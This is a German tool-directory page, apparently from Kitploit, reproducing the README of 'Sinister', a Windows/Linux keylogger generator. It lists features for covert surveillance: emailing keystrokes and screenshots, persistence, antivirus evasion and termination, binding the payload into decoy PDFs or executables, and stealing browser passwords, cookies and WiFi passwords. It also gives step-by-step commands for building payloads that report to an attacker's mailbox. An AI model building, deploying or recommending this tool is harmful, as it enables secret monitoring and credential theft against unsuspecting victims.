Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Sinister — Sinister ist ein Windows/Linux-Keylogger-Generator, der Tastenanschläge per E-Mail zusammen mit anderen interessanten Zielinformationen sendet. | Kitploit
Tools/GitHubGitHub/pushpenderindia/sinister
Passwort-CrackingPayload-GenerierungPersistenzmechanismenDatenexfiltrationInformationsbeschaffungPost-ExploitationRed TeamingRemote-Access-Tool
GitHubpushpenderindia/sinister

Sinister

Sinister ist ein Windows/Linux-Keylogger-Generator, der Tastenanschläge per E-Mail zusammen mit anderen interessanten Zielinformationen sendet.

4659329vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

Sinister Logo

Sinister

Hacker GIF

                    Dieses kleine Python-Skript kann wirklich tolle Arbeit leisten.

Sinister ist ein Keylogger-Generator für Windows/Linux, der Key-Logs und Screenshots per E-Mail sendet, zusammen mit anderen nützlichen Zielinformationen, geschrieben in Python 3.

Haftungsausschluss

:computer: Dieses Projekt wurde nur für gute Zwecke und den persönlichen Gebrauch erstellt.

DIESE SOFTWARE WIRD OHNE JEGLICHE GEWÄHRLEISTUNG BEREITGESTELLT. SIE NUTZEN DIESE SOFTWARE AUF EIGENES RISIKO. DIE NUTZUNG LIEGT IN DER VOLLEN VERANTWORTUNG DES ENDNUTZERS. DIE ENTWICKLER ÜBERNEHMEN KEINE HAFTUNG UND SIND NICHT VERANTWORTLICH FÜR MISSBRAUCH ODER SCHÄDEN, DIE DURCH DIESES PROGRAMM VERURSACHT WERDEN.

Funktionen

  • Funktioniert unter Windows/Linux
  • Benachrichtigt per E-Mail bei neuem Opfer
  • Unauffindbar
  • Persistenz
  • E-Mail-Anmeldedatenvalidierung vor der Payload-Erstellung
  • Kann Keylogs mit jedem E-Mail-Anbieter empfangen, z.B. GMAIL, YAHOO, OUTLOOK, benutzerdefiniertem SMTP.
  • SMTP-Server/Port
ServernameSMTP-ServerSMTP-Port
GMAILsmtp.gmail.com587
OUTLOOKsmtp-mail.outlook.com587
YAHOOsmtp.mail.yahoo.com587
  • Sendet Screenshot des Opfer-PC-Bildschirms per E-Mail
  • Erstellt ausführbare Binärdatei ohne Abhängigkeiten
  • Erstellt kleine Größe ~ 5 MB Payload mit erweiterten Funktionen
  • Verschleiert die Payload vor der Generierung, um einige Antiviren zu umgehen
  • Die generierte Payload ist mit base64 codiert, was das Reverse Engineering extrem erschwert
  • Funktion zum Beenden von Antiviren auf dem Opfer-PC und versucht, die Sicherheit zu deaktivieren
  • Tolle farbenfrohe Oberfläche zur Payload-Erstellung
  • Auf Angreiferseite: Während der Payload-Erstellung erkennt das Skript automatisch fehlende Abhängigkeiten und installiert sie
  • Unterscheidet Log-Daten basierend auf dem aktiven Fensternamen (Siehe Bild für besseres Verständnis)
  • Möglichkeit, benutzerdefiniertes Symbol zur bösen Datei hinzuzufügen
  • Integrierter Binder, der Keylogger an beliebige Dateien [.pdf, .txt, .exe usw.] binden kann – legitime Datei im Vordergrund, böser Code im Hintergrund als Dienst.
  • Prüft auf bereits laufende Instanz auf dem System. Läuft eine Instanz, wird nur die legitime Datei ausgeführt [Mehrfachinstanz-Sperre, um doppelte E-Mail-Protokolle zu vermeiden].
  • Angreifer kann Payload für Windows/Linux-Betriebssysteme mit einem Linux-System erstellen/kompilieren, aber mit einem Windows-Rechner nur Windows-Ausführbare Dateien erstellen/kompilieren
  • Ruft gespeicherte Passwörter vom Opfer-System ab und sendet sie an den Angreifer.
Der integrierte Stealer kann diese Dinge stehlen:
Chrome-Browser (gespeicherte Passwörter)
WiFi (gespeicherte Passwörter)
Chrome-Cookies (Login-Daten, Cookies, Verlauf)
Firefox-Cookies (cookies.sqlite)

Hinweis: Der benutzerdefinierte Stealer ist codiert, basiert nicht auf LaZagne

  • Erfasst und sendet nützliche Informationen des Opfergeräts
Diese Dinge werden erfasst und gesendet:
Betriebssystem
Computername
Benutzername
Öffentliche IPv4
  • Wenn Ihre Payload nicht ausgeführt werden kann, geben Sie --debug an, um die EXE im Vordergrund mit CMD auszuführen

Wichtig

Am 30. Mai 2022 hat Google die Funktion für weniger sichere Apps entfernt. Verwenden Sie daher statt des Gmail-Passworts:

  • Aktivieren Sie 2FA auf Ihrem Angreifer-Gmail
  • Erstellen Sie ein anwendungsspezifisches Passwort
  • Verwenden Sie dieses anwendungsspezifische Passwort beim Erstellen der Payload.
  • So erstellen Sie ein anwendungsspezifisches Passwort: Hier klicken

Getestet auf

Kali) Kali Linux – ROLLING EDITION

Windows) Windows 10

Windows) Windows 8.1 – Pro

Windows) Windows 7 – Ultimate

Voraussetzungen

  • Python 3.X
  • Einige externe Module

Verwendung unter Linux

# Navigieren Sie zum /opt-Verzeichnis (optional)
$ cd /opt/

# Klonen Sie dieses Repository
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Navigieren Sie zum Sinister-Ordner
$ cd Sinister

# Abhängigkeiten installieren
$ bash installer_linux.sh

*** Hinweis: Wenn während der Ausführung von installer_linux.sh das Python-Installationsdialogfeld erscheint ***
    * Klicken Sie auf "Benutzerdefinierte Installation"
    * Wählen Sie Pfad zu: C:/Python37-32
    ### Damit Python in diesem Pfad installiert wird (in Wine): ~/.wine/drive_c/Python37-32

# Falls Sie Fehler bei der Ausführung von installer_linux.sh erhalten, versuchen Sie die Installation mit installer_linux.py
$ python3 installer_linux.py

$ chmod +x Sinister.py
$ python3 Sinister.py --help

# Payload/RAT erstellen
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Payload mit GMAIL SMTP-Server, Port-Konfiguration (Standards: SMTP-Server = smtp.gmail.com, SMTP-Port = 587)
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Payload mit OUTLOOK SMTP-Server, Port-Konfiguration
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -l -o output_file_name --icon icon_path

# Payload mit YAHOO SMTP-Server, Port-Konfiguration
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -l -o output_file_name --icon icon_path

Hinweis: Sie können auch unsere benutzerdefinierten Icons aus dem icon-Ordner verwenden, z.B. --icon icon/pdf.ico

Verwendung unter Windows

# Abhängigkeiten installieren
$ Installieren Sie die neueste Python 3.x

# Klonen Sie dieses Repository
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Wechseln Sie in das Repository
$ cd Sinister

# Abhängigkeiten installieren
$ python -m pip install -r requirements.txt

# Öffnen Sie Sinister.py in einem Texteditor und konfigurieren Sie Zeile 16: WINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe"

# Hilfemenü anzeigen
$ python Sinister.py --help

# Payload/RAT erstellen
$ python Sinister.py -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path
Tool herunterladen